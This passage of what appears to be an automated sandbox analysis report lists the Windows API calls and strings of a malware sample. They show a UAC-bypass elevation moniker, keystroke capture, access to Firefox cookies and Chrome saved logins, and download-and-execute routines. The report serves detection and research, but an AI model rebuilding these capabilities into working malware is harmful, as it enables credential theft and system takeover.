                                • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,Pj,004752F0,00000001), ref: 0041C38E
                                • DeleteFileW.KERNEL32(?,?,?,?,?,?,Pj,004752F0,00000001), ref: 0041C39B
                                  • Part of subcall function 0041C291: RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,Pj,004752F0,00000001), ref: 0041C371
                                • GetLastError.KERNEL32(?,?,?,?,?,Pj,004752F0,00000001), ref: 0041C3BC
                                • FindClose.KERNEL32(00000000,?,?,?,?,?,Pj,004752F0,00000001), ref: 0041C3D2
                                • RemoveDirectoryW.KERNEL32(00000000,?,?,?,?,?,Pj,004752F0,00000001), ref: 0041C3D9
                                • FindClose.KERNEL32(00000000,?,?,?,?,?,Pj,004752F0,00000001), ref: 0041C3E2
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: FileFind$CloseDirectoryRemove$AttributesDeleteErrorFirstLastNext
                                • String ID: Pj
                                • API String ID: 2341273852-4015572141
                                • Opcode ID: 7754893f2187ba533a154fe4103e102bcae7ebd53560a2043af222d2c338aa0a
                                • Instruction ID: c19bc5cae20e4253aafd1d57f534f4f4794eeb6ee7264df4fdb3445c687e6cd6
                                • Opcode Fuzzy Hash: 7754893f2187ba533a154fe4103e102bcae7ebd53560a2043af222d2c338aa0a
                                • Instruction Fuzzy Hash: 1331827294031CAADB24E7A1DC88EDB736CAF04305F4405FBF955D2152EB39DAC88B68
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • _wcslen.LIBCMT ref: 00407521
                                • CoGetObject.OLE32(?,00000024,00466518,00000000), ref: 00407582
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: Object_wcslen
                                • String ID: $$Elevation:Administrator!new:$[+] CoGetObject$[+] CoGetObject SUCCESS$[+] ucmAllocateElevatedObject$[-] CoGetObject FAILURE${3E5FC7F9-9A51-4367-9063-A120244FBEC7}
                                • API String ID: 240030777-3166923314
                                • Opcode ID: c58fb5e2275a5e844cecf76189ae7002021d5fd77b9420cad953500b1bf3d6e9
                                • Instruction ID: 36c1a35fc662e139fbe0c3856e6c09b73c1590006896ac343f6f9e6a2f87480d
                                • Opcode Fuzzy Hash: c58fb5e2275a5e844cecf76189ae7002021d5fd77b9420cad953500b1bf3d6e9
                                • Instruction Fuzzy Hash: 1D115172D04218BAD710E6959C45ADEB7A89B08714F15007BF904B2282E77CAA4486BA
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • OpenSCManagerA.ADVAPI32(00000000,00000000,00000004,004758E8), ref: 0041A75E
                                • EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,?,00000000,?,?,?), ref: 0041A7AD
                                • GetLastError.KERNEL32 ref: 0041A7BB
                                • EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,00000000,?,?,?,?), ref: 0041A7F3
                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: EnumServicesStatus$ErrorLastManagerOpen
                                • String ID:
                                • API String ID: 3587775597-0
                                • Opcode ID: e314ccd8c52d6eea2e4540d377f75477af79112b351f4132febb0a489c34d42f
                                • Instruction ID: 0905bbee584710e72bd43cf86ffd47af08151029a50ddcda7611e9b1cb6672f7
                                • Opcode Fuzzy Hash: e314ccd8c52d6eea2e4540d377f75477af79112b351f4132febb0a489c34d42f
                                • Instruction Fuzzy Hash: A1815F71104305ABC304EB61D885DAFB7A8FF94749F50092FF585521A2EF78EE48CB9A
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • FindFirstFileW.KERNEL32(00000000,?), ref: 00419D4B
                                • FindNextFileW.KERNEL32(00000000,?,?), ref: 00419E17
                                  • Part of subcall function 0041C485: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,0040A843), ref: 0041C49E
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: File$Find$CreateFirstNext
                                • String ID: (eF$8SG$PXG$PXG$NG$PG
                                • API String ID: 341183262-875132146
                                • Opcode ID: a249e7fb000a4d3a6754af60f986f53d15ee355c44bdbf7b4608c8c4e81cf226
                                • Instruction ID: 96038134cf9b6260143958ba34f432c8b7c7433700823f8ab46a3e18139dd1a2
                                • Opcode Fuzzy Hash: a249e7fb000a4d3a6754af60f986f53d15ee355c44bdbf7b4608c8c4e81cf226
                                • Instruction Fuzzy Hash: D48152315083415AC314FB22C856EEFB3A9AF90344F90493FF546671E2EF789A49C69A
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                  • Part of subcall function 00448215: GetLastError.KERNEL32(00000020,?,0043A7F5,?,?,?,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B), ref: 00448219
                                  • Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
                                  • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 0044828D
                                  • Part of subcall function 00448215: _abort.LIBCMT ref: 00448293
                                  • Part of subcall function 00448215: _free.LIBCMT ref: 00448274
                                  • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 00448281
                                • GetUserDefaultLCID.KERNEL32(?,?,?), ref: 0045271C
                                • IsValidCodePage.KERNEL32(00000000), ref: 00452777
                                • IsValidLocale.KERNEL32(?,00000001), ref: 00452786
                                • GetLocaleInfoW.KERNEL32(?,00001001,lJD,00000040,?,?,00000055,00000000,?,?,00000055,00000000), ref: 004527CE
                                • GetLocaleInfoW.KERNEL32(?,00001002,00000000,00000040), ref: 004527ED
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                Yara matches
                                Similarity
                                • API ID: ErrorLastLocale$InfoValid_free$CodeDefaultPageUser_abort
                                • String ID: lJD$lJD$lJD
                                • API String ID: 745075371-479184356
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • FindFirstFileW.KERNEL32(00000000,?,\Mozilla\Firefox\Profiles\,00000000), ref: 0040C39B
                                • FindNextFileW.KERNEL32(00000000,?), ref: 0040C46E
                                • FindClose.KERNEL32(00000000), ref: 0040C47D
                                • FindClose.KERNEL32(00000000), ref: 0040C4A8
                                Strings
                                Yara matches
                                Similarity
                                • API ID: Find$CloseFile$FirstNext
                                • String ID: AppData$\Mozilla\Firefox\Profiles\$\cookies.sqlite
                                • API String ID: 1164774033-405221262
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • GetForegroundWindow.USER32(?,?,004750F0), ref: 0040A416
                                • GetWindowThreadProcessId.USER32(00000000,?), ref: 0040A422
                                • GetKeyboardLayout.USER32(00000000), ref: 0040A429
                                • GetKeyState.USER32(00000010), ref: 0040A433
                                • GetKeyboardState.USER32(?,?,004750F0), ref: 0040A43E
                                • ToUnicodeEx.USER32(00475144,00000000,?,?,00000010,00000000,00000000), ref: 0040A461
                                • ToUnicodeEx.USER32(?,?,00000010,00000000,00000000), ref: 0040A4C1
                                • ToUnicodeEx.USER32(00475144,?,?,?,00000010,00000000,00000000), ref: 0040A4FA
                                Yara matches
                                Similarity
                                • API ID: Unicode$KeyboardStateWindow$ForegroundLayoutProcessThread
                                • String ID:
                                • API String ID: 1888522110-0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • RegCreateKeyExW.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 0041409D
                                • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 004140A9
                                  • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                • LoadLibraryA.KERNEL32(Shlwapi.dll,SHDeleteKeyW,00000000,00000001), ref: 0041426A
                                • GetProcAddress.KERNEL32(00000000), ref: 00414271
                                Strings
                                Yara matches
                                Similarity
                                • API ID: AddressCloseCreateLibraryLoadProcsend
                                • String ID: SHDeleteKeyW$Shlwapi.dll
                                • API String ID: 2127411465-314212984
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • _free.LIBCMT ref: 00449212
                                • _free.LIBCMT ref: 00449236
                                • _free.LIBCMT ref: 004493BD
                                • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,0045F234), ref: 004493CF
                                • WideCharToMultiByte.KERNEL32(00000000,00000000,00472764,000000FF,00000000,0000003F,00000000,?,?), ref: 00449447
                                • WideCharToMultiByte.KERNEL32(00000000,00000000,004727B8,000000FF,?,0000003F,00000000,?), ref: 00449474
                                • _free.LIBCMT ref: 00449589
                                Yara matches
                                Similarity
                                • API ID: _free$ByteCharMultiWide$InformationTimeZone
                                • String ID:
                                • API String ID: 314583886-0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 00406FBC
                                • URLDownloadToFileW.URLMON(00000000,00000000,00000004,00000000,00000000), ref: 004070A0
                                Strings
                                Yara matches
                                Similarity
                                • API ID: DownloadExecuteFileShell
                                • String ID: aF$ aF$C:\Users\user\Desktop\xi0TpAxHGMsm.exe$open
                                • API String ID: 2825088817-2247774112
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • __EH_prolog.LIBCMT ref: 00408811
                                • FindFirstFileW.KERNEL32(00000000,?,00466608,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004088CA
                                • __CxxThrowException@8.LIBVCRUNTIME ref: 004088F2
                                • FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004088FF
                                • FindClose.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00408A15
                                Strings
                                Yara matches
                                Similarity
                                • API ID: Find$File$CloseException@8FirstH_prologNextThrow
                                • String ID: hdF
                                • API String ID: 1771804793-665520524
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                  • Part of subcall function 00417952: GetCurrentProcess.KERNEL32(00000028,?), ref: 0041795F
                                  • Part of subcall function 00417952: OpenProcessToken.ADVAPI32(00000000), ref: 00417966
                                  • Part of subcall function 00417952: LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00417978
                                  • Part of subcall function 00417952: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00417997
                                  • Part of subcall function 00417952: GetLastError.KERNEL32 ref: 0041799D
                                • ExitWindowsEx.USER32(00000000,00000001), ref: 00416856
                                • LoadLibraryA.KERNEL32(PowrProf.dll,SetSuspendState,00000000,00000000,00000000), ref: 0041686B
                                • GetProcAddress.KERNEL32(00000000), ref: 00416872
                                Strings
                                Yara matches
                                Similarity
                                • API ID: ProcessToken$AddressAdjustCurrentErrorExitLastLibraryLoadLookupOpenPrivilegePrivilegesProcValueWindows
                                • String ID: !D@$PowrProf.dll$SetSuspendState
                                • API String ID: 1589313981-2876530381
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • GetLocaleInfoW.KERNEL32(00000000,2000000B,00000000,00000002,00000000,?,?,?,0045275B,?,00000000), ref: 004524D5
                                • GetLocaleInfoW.KERNEL32(00000000,20001004,00000000,00000002,00000000,?,?,?,0045275B,?,00000000), ref: 004524FE
                                • GetACP.KERNEL32(?,?,0045275B,?,00000000), ref: 00452513
                                Strings
                                Yara matches
                                Similarity
                                • API ID: InfoLocale
                                • String ID: ACP$OCP$['E
                                • API String ID: 2299586839-2532616801
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Login Data), ref: 0040BA4E
                                • GetLastError.KERNEL32 ref: 0040BA58
                                Strings
                                • [Chrome StoredLogins found, cleared!], xrefs: 0040BA7E
                                • [Chrome StoredLogins not found], xrefs: 0040BA72
                                • UserProfile, xrefs: 0040BA1E
                                • \AppData\Local\Google\Chrome\User Data\Default\Login Data, xrefs: 0040BA19
                                Yara matches
                                Similarity
                                • API ID: DeleteErrorFileLast
                                • String ID: [Chrome StoredLogins found, cleared!]$[Chrome StoredLogins not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Login Data
                                • API String ID: 2018770650-1062637481
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • GetCurrentProcess.KERNEL32(00000028,?), ref: 0041795F
                                • OpenProcessToken.ADVAPI32(00000000), ref: 00417966
                                • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00417978
                                • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00417997
                                • GetLastError.KERNEL32 ref: 0041799D
                                Strings
                                Yara matches
                                Similarity
                                • API ID: ProcessToken$AdjustCurrentErrorLastLookupOpenPrivilegePrivilegesValue
                                • String ID: SeShutdownPrivilege
                                • API String ID: 3534403312-3733053543
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                Strings
                                Yara matches
                                Similarity
                                • API ID: __floor_pentium4
                                • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                • API String ID: 4168288129-2761157908
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • __EH_prolog.LIBCMT ref: 00409258
                                  • Part of subcall function 004048C8: connect.WS2_32(FFFFFFFF,?,?), ref: 004048E0
                                  • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                • __CxxThrowException@8.LIBVCRUNTIME ref: 004092F4
                                • FindFirstFileW.KERNEL32(00000000,?,?,?,00000064), ref: 00409352
                                • FindNextFileW.KERNEL32(00000000,?), ref: 004093AA
                                • FindClose.KERNEL32(00000000), ref: 004093C1
                                  • Part of subcall function 00404E26: WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E38
                                  • Part of subcall function 00404E26: SetEvent.KERNEL32(?,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E43
                                  • Part of subcall function 00404E26: CloseHandle.KERNEL32(?,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E4C
                                • FindClose.KERNEL32(00000000), ref: 004095B9
                                  • Part of subcall function 00404AA1: WaitForSingleObject.KERNEL32(00000000,00000000,0040547D,?,?,00000004,?,?,00000004,?,00474EF8,?), ref: 00404B47
                                  • Part of subcall function 00404AA1: SetEvent.KERNEL32(00000000,?,?,00000004,?,?,00000004,?,00474EF8,?,?,?,?,?,?,0040547D), ref: 00404B75
                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: Find$Close$EventFileObjectSingleWait$Exception@8FirstH_prologHandleNextThrowconnectsend
                                • String ID:
                                • API String ID: 1824512719-0
                                • Opcode ID: 9c630c7401a626c7222823fbff663f7013c51d1402800f2316400fa3dda2cb01
                                • Instruction ID: 125c9cc0036adb3739497efb01147483584b5989e706bb19fe9a4109aadf0594
                                • Opcode Fuzzy Hash: 9c630c7401a626c7222823fbff663f7013c51d1402800f2316400fa3dda2cb01
                                • Instruction Fuzzy Hash: DCB18D32900109AACB14EBA1DD96AED7779AF04318F10417FF506B60E2EF785E49CB98
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • OpenSCManagerW.ADVAPI32(00000000,00000000,00000010,00000000,00000001,?,0041A6A0,00000000), ref: 0041AA53
                                • OpenServiceW.ADVAPI32(00000000,00000000,00000010,?,0041A6A0,00000000), ref: 0041AA68
                                • CloseServiceHandle.ADVAPI32(00000000,?,0041A6A0,00000000), ref: 0041AA75
                                • StartServiceW.ADVAPI32(00000000,00000000,00000000,?,0041A6A0,00000000), ref: 0041AA80
                                • CloseServiceHandle.ADVAPI32(00000000,?,0041A6A0,00000000), ref: 0041AA92
                                • CloseServiceHandle.ADVAPI32(00000000,?,0041A6A0,00000000), ref: 0041AA95
                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: Service$CloseHandle$Open$ManagerStart
                                • String ID:
                                • API String ID: 276877138-0
                                • Opcode ID: 38ff3efd75794608fc7efc6ab14161dff6b0215efc9cafdd27725548e5e732cb
                                • Instruction ID: 9fefcdd13c5f6832e1e8d6374d810b05479d45f16fba084c356bea358aebaaee
                                • Opcode Fuzzy Hash: 38ff3efd75794608fc7efc6ab14161dff6b0215efc9cafdd27725548e5e732cb
                                • Instruction Fuzzy Hash: FCF08971101325AFD2119B619C88DFF2B6CDF85BA6B00082AF945921919B68CD49E9B9
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                  • Part of subcall function 00448215: GetLastError.KERNEL32(00000020,?,0043A7F5,?,?,?,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B), ref: 00448219
                                  • Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
                                  • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 0044828D
                                  • Part of subcall function 00448215: _abort.LIBCMT ref: 00448293
                                • IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,00444A73,?,?,?,?,004444CA,?,00000004), ref: 00451DBA
                                • _wcschr.LIBVCRUNTIME ref: 00451E4A
                                • _wcschr.LIBVCRUNTIME ref: 00451E58
                                • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,sJD,00000000,?), ref: 00451EFB
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: ErrorLast_wcschr$CodeInfoLocalePageValid_abort_free
                                • String ID: sJD
                                • API String ID: 4212172061-3536923933
                                • Opcode ID: 7ea90a810ccb8eded513053f15f94d45dc96679ac5d2c45bddb92c1ff4a69e8d
                                • Instruction ID: 601d6103ecad0283333aca7e4f79148897faf6e4cefa34abd84194fcdbd45a0d
                                • Opcode Fuzzy Hash: 7ea90a810ccb8eded513053f15f94d45dc96679ac5d2c45bddb92c1ff4a69e8d
                                • Instruction Fuzzy Hash: ED61FA35500606AAE724AB75CC86BBB73A8EF04316F14046FFD05D7292EB78ED48C769
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • FindFirstFileW.KERNEL32(00000000,?,?,?,00000000), ref: 00407857
                                • FindNextFileW.KERNEL32(00000000,?,?,?,00000000), ref: 0040791F
                                  • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: FileFind$FirstNextsend
                                • String ID: (eF$XPG$XPG
                                • API String ID: 4113138495-1496965907
                                • Opcode ID: 0ee990551136ebbbbd4efb79b9626d6c73b3c9f9a78fbc4ad3dd3101d052f1d5
                                • Instruction ID: 6b6d716c6ecdfe6ec78918620e47e684a121d368db73a1555a51ac38f2ecb6eb
                                • Opcode Fuzzy Hash: 0ee990551136ebbbbd4efb79b9626d6c73b3c9f9a78fbc4ad3dd3101d052f1d5
                                • Instruction Fuzzy Hash: 212195325083419BC314FB61D855DEFB3ACAF90358F40493EF696621E1EF78AA09C65B
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • FindResourceA.KERNEL32(SETTINGS,0000000A,00000000), ref: 0041B4B9
                                • LoadResource.KERNEL32(00000000,?,?,0040F3DE,00000000), ref: 0041B4CD
                                • LockResource.KERNEL32(00000000,?,?,0040F3DE,00000000), ref: 0041B4D4
                                • SizeofResource.KERNEL32(00000000,?,?,0040F3DE,00000000), ref: 0041B4E3
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: Resource$FindLoadLockSizeof
                                • String ID: SETTINGS
                                • API String ID: 3473537107-594951305
                                • Opcode ID: 572f255012f9d3464d264dba9da87f940f43aba7d13ccaaee0753afa8a381888
                                • Instruction ID: 65170a014006dd87783428e4339c5f85687a52ee3761dac8d56b05c0676c202a
                                • Opcode Fuzzy Hash: 572f255012f9d3464d264dba9da87f940f43aba7d13ccaaee0753afa8a381888
                                • Instruction Fuzzy Hash: 8AE01A36200B22EBEB311BA5AC4CD473E29F7C97637100075F90596232CB798840DAA8
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • __EH_prolog.LIBCMT ref: 0040966A
                                • FindFirstFileW.KERNEL32(00000000,?,00000000,00000000,?), ref: 004096E2
                                • FindNextFileW.KERNEL32(00000000,?), ref: 0040970B
                                • FindClose.KERNEL32(000000FF,?,?,?,?,?,?), ref: 00409722
                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: Find$File$CloseFirstH_prologNext
                                • String ID:
                                • API String ID: 1157919129-0
                                • Opcode ID: 9a246007e106ae57227cd4fa2dc9241d70865749bb41c708d12fdd9bc8fa6ccf
                                • Instruction ID: bc6583c976318a9931a9d4e75bf6093b5b8d8c817350453c5398c0af4fd679c1
                                • Opcode Fuzzy Hash: 9a246007e106ae57227cd4fa2dc9241d70865749bb41c708d12fdd9bc8fa6ccf
                                • Instruction Fuzzy Hash: 59812B329001199BCB15EBA1DC969EDB378AF14318F10417FE506B71E2EF78AE49CB58
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • SystemParametersInfoW.USER32(00000014,00000000,00000000,00000003), ref: 0041CAD7
                                  • Part of subcall function 0041376F: RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 0041377E
                                  • Part of subcall function 0041376F: RegSetValueExA.KERNEL32(?,004674B8,00000000,?,00000000,00000000,004752F0,?,?,0040F853,004674B8,4.9.3 Pro), ref: 004137A6
                                  • Part of subcall function 0041376F: RegCloseKey.KERNEL32(?,?,?,0040F853,004674B8,4.9.3 Pro), ref: 004137B1
                                Strings
                                Memory Dump Source
